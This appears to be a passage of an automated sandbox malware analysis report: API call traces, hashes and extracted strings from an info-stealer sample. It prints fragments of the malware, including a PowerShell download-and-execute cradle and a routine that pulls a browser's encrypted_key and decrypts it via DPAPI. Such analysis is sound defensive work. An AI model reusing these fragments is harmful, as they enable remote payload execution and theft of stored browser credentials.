                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction ID: 57d0184eccfd883a9fbe46d84bccd4f6d7df6eced763943a331e98d88b1d335f
                                      • Opcode Fuzzy Hash: c3da04e987efa8c3bc657412c5dcc3be7704e612d0e6c1399905993ce2b8bcb5
                                      • Instruction Fuzzy Hash: AE3114B8A10209EFDB14CFD4C884BAE77F5FB48304F108158F915AB294D778AA81CFA1
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C9EA
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __amsg_exit.LIBCMT ref: 0041CA0A
                                      • __lock.LIBCMT ref: 0041CA1A
                                      • InterlockedDecrement.KERNEL32(?), ref: 0041CA37
                                      • free.MSVCRT ref: 0041CA4A
                                      • InterlockedIncrement.KERNEL32(0042B558), ref: 0041CA62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                      • Instruction ID: 84b4572ca590114782b091576b9a89d8360325c6110713fe167f1eb626e4287d
                                      • Opcode Fuzzy Hash: 89c3f3603ea426d8c1dcae7c91f98695ae5431033bc18fad3d55e9ead8607d02
                                      • Instruction Fuzzy Hash: 5801C431A817299BC722EB669C857DE77A0BF04794F01811BE81467390C72C69D2CBDD
                                      APIs
                                      • __getptd.LIBCMT ref: 022ECC51
                                        • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                        • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                      • __amsg_exit.LIBCMT ref: 022ECC71
                                      • __lock.LIBCMT ref: 022ECC81
                                      • InterlockedDecrement.KERNEL32(?), ref: 022ECC9E
                                      • free.MSVCRT ref: 022ECCB1
                                      • InterlockedIncrement.KERNEL32(0042B980), ref: 022ECCC9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
                                      • String ID:
                                      • API String ID: 634100517-0
                                      • Opcode ID: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                      • Instruction ID: e28fbded98c7fd5dae72b16c23fdeb074884fefa5ce1b9942b7ceca60593d41b
                                      • Opcode Fuzzy Hash: 5d7d5386ca12c030d3e9ef79b035ddd590771242ace2c96a8d9315f1b641efb0
                                      • Instruction Fuzzy Hash: BF01D232A21B26ABCF21ABE5944475D7760FF04714FC04127EC16672A8CB746881FFE9
                                      APIs
                                      • strlen.MSVCRT ref: 00416F1F
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041719A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 00416F4D
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416BE1
                                        • Part of subcall function 00416BD0: strlen.MSVCRT ref: 00416C05
                                      • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 00416F92
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041719A), ref: 004170B3
                                        • Part of subcall function 00416DE0: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00416DF8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: da6ee04ed372484ea639f8c5ae6d2cf8ded6d6947598eb42fecba3fc0a9bdd2e
                                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction Fuzzy Hash: 27511CB5E041099BDB04CF98D981AEFBBB5FF88304F108559F919A7340D738EA51CBA5
                                      APIs
                                      • strlen.MSVCRT ref: 022E7186
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,022E7401,00000000,00420BA8,00000000,00000000), ref: 022E71B4
                                        • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E48
                                        • Part of subcall function 022E6E37: strlen.MSVCRT ref: 022E6E6C
                                      • VirtualQueryEx.KERNEL32(022E7574,00000000,?,0000001C), ref: 022E71F9
                                      • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,022E7401), ref: 022E731A
                                        • Part of subcall function 022E7047: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 022E705F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strlen$MemoryProcessQueryReadVirtual
                                      • String ID: @
                                      • API String ID: 2950663791-2766056989
                                      • Opcode ID: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction ID: 1a5eb8b31e6e47d254f1ef9652c013fac4ea2837b66191479c99be81b83a4cc8
                                      • Opcode Fuzzy Hash: 0d89010186691ec5492239175b82a1a91f8bc2a2393b87c9978cf9f8736f9be8
                                      • Instruction Fuzzy Hash: B151F8B1D1010AEBDF04CFD8D991AEFB7B6BF88300F048519F916A7244D774AA01DBA1
                                      APIs
                                      • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E2A), ref: 00406A19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: *n@$*n@
                                      • API String ID: 1029625771-193229609
                                      • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                      • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                      • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                      APIs
                                      • lstrcat.KERNEL32(?,0064A30C), ref: 022E4A42
                                        • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                      • lstrcat.KERNEL32(?,00000000), ref: 022E4A68
                                      • lstrcat.KERNEL32(?,?), ref: 022E4A87
                                      • lstrcat.KERNEL32(?,?), ref: 022E4A9B
                                      • lstrcat.KERNEL32(?,0064A284), ref: 022E4AAE
                                      • lstrcat.KERNEL32(?,?), ref: 022E4AC2
                                      • lstrcat.KERNEL32(?,0064A2C8), ref: 022E4AD6
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                        • Part of subcall function 022E47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                        • Part of subcall function 022E47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                        • Part of subcall function 022E47D7: wsprintfA.USER32 ref: 022E480D
                                        • Part of subcall function 022E47D7: FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction ID: f2d4d514add2d969cebb377d1db9d96e4ed18de71ae1ecd4539420b9d826a375
                                      • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                      • Instruction Fuzzy Hash: CB3192B69503086BDF10FBF0CC84EED737AAB58700F8045C9B24696094EEB49789DF95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                      Strings
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                      • <, xrefs: 00412D39
                                      • ')", xrefs: 00412CB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 961cbb28e43a4a0894515638c38ba2f06ec96ace37f5fbfea44cb09a5a48cde2
                                      • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                      • Opcode Fuzzy Hash: 961cbb28e43a4a0894515638c38ba2f06ec96ace37f5fbfea44cb09a5a48cde2
                                      • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                      • __aulldiv.LIBCMT ref: 022D14BF
                                      • __aulldiv.LIBCMT ref: 022D14CD
                                      • ExitProcess.KERNEL32 ref: 022D14FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction ID: 06d6101d926c31066536a6e1e8b75f2bc983d3fcd1a147eb1f670d67b98c375a
                                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                      • Instruction Fuzzy Hash: 0E011DB0961308BAEF10DBD0CC89B9DBB7DAB00B05F609448E70A776C8D7B4A5958B55
                                      APIs
                                      • memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022E0CC7: memset.MSVCRT ref: 022E0E83
                                        • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                        • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                        • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                        • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                      • memcmp.MSVCRT(?,00421114,00000003), ref: 022DA116
                                      • memset.MSVCRT ref: 022DA14F
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 022DA1A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @
                                      • API String ID: 1977917189-2766056989
                                      • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction ID: 1033d2c68e6845531657e77deb6a04fad2dd76ddb81437c13d48f650b9555aab
                                      • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                      • Instruction Fuzzy Hash: 05615C30A203489BDF24EFE4CD95FED7776AF54304F408118E90A5B698DBB46A05CF51
                                      APIs
                                      • strtok_s.MSVCRT ref: 00410DB8
                                      • strtok_s.MSVCRT ref: 00410EFD
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: strtok_s$lstrcpylstrlen
                                      • String ID:
                                      • API String ID: 348468850-0
                                      • Opcode ID: 4b65800d2acd206e274dc109e46f0dc3360a9f17ae9b107857cd5d01ef403ffa
                                      • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                      • Opcode Fuzzy Hash: 4b65800d2acd206e274dc109e46f0dc3360a9f17ae9b107857cd5d01ef403ffa
                                      • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                        • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                        • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                        • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                        • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                        • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                        • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                        • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                        • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                        • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                        • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                        • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                        • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 3731072634-738592651
                                      • Opcode ID: ec1d14112c2b47acda790e7146917a556e3d144796ef31f461d2d78a3888e4ed
                                      • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                      • Opcode Fuzzy Hash: ec1d14112c2b47acda790e7146917a556e3d144796ef31f461d2d78a3888e4ed
                                      • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CodeInfoPageValidmemset
                                      • String ID:
                                      • API String ID: 703783727-0
                                      • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction ID: b1b66c0af393fb712239824e55ca1d3d67ab2e75243c17e9d4cbdf9bdafd0db6
                                      • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                      • Instruction Fuzzy Hash: ED312B30A242929EDF259FF8C8542797FA09B06314B8841BBD883CF19AC778C405E762
                                      APIs
                                      • GetSystemTime.KERNEL32(?), ref: 022E6BD3
                                      • sscanf.NTDLL ref: 022E6C00
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C19
                                      • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C27
                                      • ExitProcess.KERNEL32 ref: 022E6C41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID:
                                      • API String ID: 2533653975-0
                                      • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction ID: eb3b71ad43b573599eead478bf84f8e489c540ff3c251f41f64a1c6ec8ece494
                                      • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                      • Instruction Fuzzy Hash: F221EBB5D14209AFCF08EFE4D9499EEB7BAFF48300F44952EE406A3254EB345604CB65
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                      • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                      • RegOpenKeyExA.ADVAPI32(80000002,00689D78,00000000,00020119,?), ref: 00417E5E
                                      • RegQueryValueExA.ADVAPI32(?,006C0240,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                      • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E809E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E80A5
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022E80C5
                                      • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022E80E6
                                      • RegCloseKey.ADVAPI32(?), ref: 022E80F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction ID: 1cfbfafacebd8db028af679e1c0ef27b95508f54e4dc37e628e7a89a8b328d39
                                      • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                      • Instruction Fuzzy Hash: 6C113DB5A94209BBDB10CFD4DD4AFBBB7B9EB05710F104219F616A7290C7B558008BA2
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E799B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022E79A2
                                      • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022E7920), ref: 022E79C2
                                      • RegQueryValueExA.ADVAPI32(022E7920,00420AAC,00000000,00000000,?,000000FF), ref: 022E79E1
                                      • RegCloseKey.ADVAPI32(022E7920), ref: 022E79EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction ID: 56d574a23b1c796c7e6fce387c749d245cc72171ec3e13636da9deb623f7c15c
                                      • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                      • Instruction Fuzzy Hash: 850144B9A40308BFEB10DFE0DC49FAEB7B9EB48701F104159FA05A7280D67455008F51
                                      APIs
                                      • StrStrA.SHLWAPI(006BF630,?,?,?,0041140C,?,006BF630,00000000), ref: 0041926C
